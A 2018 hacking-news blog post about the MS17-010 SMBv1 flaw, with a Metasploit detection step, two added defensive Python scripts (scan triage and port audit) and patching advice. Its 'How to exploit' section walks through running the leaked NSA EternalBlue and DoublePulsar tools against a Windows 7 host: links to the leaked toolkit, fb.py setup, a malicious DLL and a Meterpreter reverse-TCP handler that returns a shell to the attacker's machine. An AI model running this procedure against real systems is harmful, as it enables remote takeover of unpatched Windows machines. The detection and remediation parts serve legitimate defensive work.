Hacking News

Published on May 14th, 2018


Detect MS17-010 SMB vulnerability using Metasploit

Remote code execution vulnerabilities exist in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerabilities could gain the ability to execute code on the target server.

To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.

Detect MS17-010 SMB vulnerability using Metasploit

  1. Update Metasploit
    apt-get update && apt-get upgrade
  2. Open msfconsole and load the module auxiliary/scanner/smb/smb_ms17_010. Set the RHOSTS and RPORT parameters.
    Module info:


    Uses information disclosure to determine if MS17-010 has been patched or not.
    Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.
    If the status returned is “STATUS_INSUFF_SERVER_RESOURCES”, the machine does
    not have the MS17-010 patch.
    If the machine is missing the MS17-010 patch, the module will check for an
    existing DoublePulsar (ring 0 shellcode/malware) infection.
    This module does not require valid SMB credentials in default server
    configurations. It can log on as the user “\” and connect to IPC$.

  3. How to exploit:
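Once step 2 has run against an address range, the scanner prints one line per host, and the next job is to hand those results to whoever patches and whoever investigates. The following Python script is an added example, not code from the original post or from Metasploit: it parses the scanner's lines into one finding per host, keeps the worst status when a host appears twice (vulnerable and DoublePulsar-infected), and groups hosts by next action. The line format it matches and the sample output embedded in SAMPLE are constructed to resemble the module's messages, so verify the regex against your own msfconsole output before relying on it.

```python
"""Triage smb_ms17_010 scanner output into a remediation worklist.

Added example (not from the original post or from Metasploit): reads the
text printed by auxiliary/scanner/smb/smb_ms17_010 and groups hosts by
what needs to happen next. The line format and the SAMPLE output below
are constructed for this example.
"""
import re
import sys
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Severity order used when one host produces several lines: a vulnerable
# host that is also flagged as DoublePulsar-infected counts as "infected".
RANK = {"error": 0, "patched": 1, "vulnerable": 2, "infected": 3}

# "[+] 192.168.199.107:445   - message"  (prefix, host, port, message)
LINE_RE = re.compile(r"^\[([-+*!])\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+(.*)$")
# msfconsole may colour its output when run non-interactively; drop ANSI codes.
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")


@dataclass
class Finding:
    host: str
    port: int
    status: str   # infected | vulnerable | patched | error
    detail: str


def classify(message: str) -> str:
    """Map one scanner message to a status keyword."""
    if "INFECTED with DoublePulsar" in message:
        return "infected"
    if "VULNERABLE to MS17-010" in message:
        return "vulnerable"
    if "does NOT appear vulnerable" in message:
        return "patched"
    return "error"   # login error, timeout, anything unexpected


def parse_line(line: str) -> Optional[Finding]:
    """Return a Finding for a per-host line, None for progress/summary lines."""
    m = LINE_RE.match(ANSI_RE.sub("", line).strip())
    if not m:
        return None
    _, host, port, message = m.groups()
    return Finding(host, int(port), classify(message), message)


def parse_scan(lines: Iterable[str]) -> Dict[str, Finding]:
    """Collapse all lines into one Finding per host, keeping the worst status."""
    results: Dict[str, Finding] = {}
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        current = results.get(f.host)
        if current is None or RANK[f.status] > RANK[current.status]:
            results[f.host] = f
    return results


def triage(results: Dict[str, Finding]) -> Dict[str, List[str]]:
    """Group hosts by the next action for the patch and IR teams."""
    action = {"infected": "isolate_and_investigate",
              "vulnerable": "patch_or_disable_smb1",
              "patched": "no_action",
              "error": "rescan"}
    buckets: Dict[str, List[str]] = {name: [] for name in action.values()}
    for host in sorted(results, key=lambda h: tuple(int(o) for o in h.split("."))):
        buckets[action[results[host].status]].append(host)
    return buckets


# Constructed sample output (not a real scan) in the module's line style.
SAMPLE = """\
[+] 192.168.199.107:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[!] 192.168.199.107:445   - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x00000000
[*] 192.168.199.108:445   - Host does NOT appear vulnerable.
[+] 192.168.199.109:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.199.110:445   - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.199.0/24:445  - Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed
"""


if __name__ == "__main__":
    # Read a real scan from stdin when piped in; otherwise show the sample.
    text = SAMPLE if sys.stdin.isatty() else (sys.stdin.read() or SAMPLE)
    for bucket, hosts in triage(parse_scan(text.splitlines())).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

On a live scan, pipe msfconsole into it, for example `msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS 192.168.199.0/24; run; exit" | python3 triage_ms17_010.py` (the script name and the /24 range are assumptions). A host in the isolate_and_investigate bucket already has a kernel-mode implant answering on port 445, so it belongs to incident response before it belongs to the patch queue; hosts in rescan produced no verdict (login error, timeout) and must not be recorded as patched.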

The Shadow Brokers once again shocked the world by leaking a confidential archive containing a number of polished Windows remote exploits that cover a large range of Windows servers; almost all Windows servers were exposed to risk overnight.

Update 7/11/2017

Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 – ‘EternalBlue’ SMB Remote Code Execution. Download here.

Update 5/18/2017

GitHub user worawit ported the EternalBlue exploit to work on Windows 8/Server 2012. Download here.

Update 4/28/2017

The ETERNALBLUE module in the leaked toolkit is an exploit that targets an open port 445 on an unpatched Windows machine; this article walks through using it:

1. Download the leaked NSA tools:

https://github.com/x0rz/EQGRP_Lost_in_Translation

2. Installation

  • python 2.6
  • pywin32

Environment configuration: extract the downloaded EQGRP_Lost_in_Translation archive, find \windows\fb.py, and comment out the following two sections.

3. Environment

  • Attacker machines: 192.168.71.130 (Kali Linux) and 192.168.71.133 (Windows Server 2008 32-bit)
  • Target machine: 192.168.199.107 (Windows 7 64-bit)

4. Exploit

Run fb.py

Set the target IP address to 192.168.199.107 and the callback address to 192.168.71.133.

Next enter the command:

use ETERNALBLUE

Then fill in the relevant parameters; the timeout and the other parameters that have defaults can be accepted by pressing Enter:

Since the target is Windows 7, select target 1: win72k8r2

Mode: select 1, FB

Confirm the information and execute.

After it succeeds, run use Doublepulsar:

Fill in the parameters in turn; note the choice of function 2, RunDLL.

On the attacker machine, generate the attack DLL with msfvenom:

Then execute:

$ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.71.130
msf > set LPORT 5555
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

Meanwhile, copy the generated upload.dll to attacker machine 1 (192.168.71.133); back on attacker machine 1, fill in the path to the attack DLL:

Press Enter to launch the attack.

On the Kali Linux machine, a shell comes back.

How to fix

Microsoft said that it had already patched the Windows vulnerabilities released by the Shadow Brokers team. After the hacking tools, which may have come from the National Security Agency, were released online the day before, Microsoft tested and confirmed that patches were available for all currently supported versions of Windows. This means that older Windows XP or Windows Vista systems may still be vulnerable to the three released vulnerabilities, and Microsoft is unlikely to provide patches for older versions of Windows that it no longer supports. Apply the patch promptly, and close ports 139, 445 and 3389 where they are not needed.
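To confirm that the fix actually took effect, a check from a second machine is more trustworthy than reading the firewall console. The following Python script is an added example, not code from the original post: it attempts a TCP connection to ports 139, 445 and 3389 on each named host and reports any that still answer. The default host in the script is the post's target address and is used only as a constructed example; pass your own addresses as arguments.

```python
"""Verify that the MS17-010 remediation took effect on the network.

Added example (not from the original post). After patching and closing
ports 139, 445 and 3389 as the post recommends, this script confirms from
a separate machine that those ports no longer accept TCP connections.
The default target address is a constructed example.
"""
import socket
import sys
from typing import Dict, Iterable, List

# Ports the post says to close on hosts that do not need them:
# NetBIOS session service, SMB, RDP.
RECOMMENDED_CLOSED = {139: "NetBIOS-SSN", 445: "SMB", 3389: "RDP"}


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """True only if a TCP handshake completes; refused or filtered -> False."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except (OSError, socket.timeout):
        return False


def audit(hosts: Iterable[str], ports: Iterable[int] = RECOMMENDED_CLOSED,
          timeout: float = 1.0) -> Dict[str, Dict[int, bool]]:
    """Map each host to {port: is_open} for the ports that should be closed."""
    return {h: {p: port_open(h, p, timeout) for p in ports} for h in hosts}


def still_exposed(results: Dict[str, Dict[int, bool]]) -> List[str]:
    """List host:port pairs that are still reachable after remediation."""
    exposed = []
    for host, ports in results.items():
        for port, is_open in sorted(ports.items()):
            if is_open:
                exposed.append(f"{host}:{port} ({RECOMMENDED_CLOSED.get(port, 'tcp')})")
    return exposed


if __name__ == "__main__":
    # Constructed default: the post's target host; pass real hosts as arguments.
    targets = sys.argv[1:] or ["192.168.199.107"]
    findings = still_exposed(audit(targets))
    if findings:
        print("Still reachable after remediation:")
        for entry in findings:
            print("  " + entry)
        sys.exit(1)
    print("All audited ports closed on", ", ".join(targets))
```

A non-zero exit code makes the script usable as a gate in a scheduled job. It only proves that the port is unreachable from where it runs; on file servers that must keep 445 open, re-run the step-2 scanner after patching instead, since that check asks the SMB service itself whether the fix is present.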
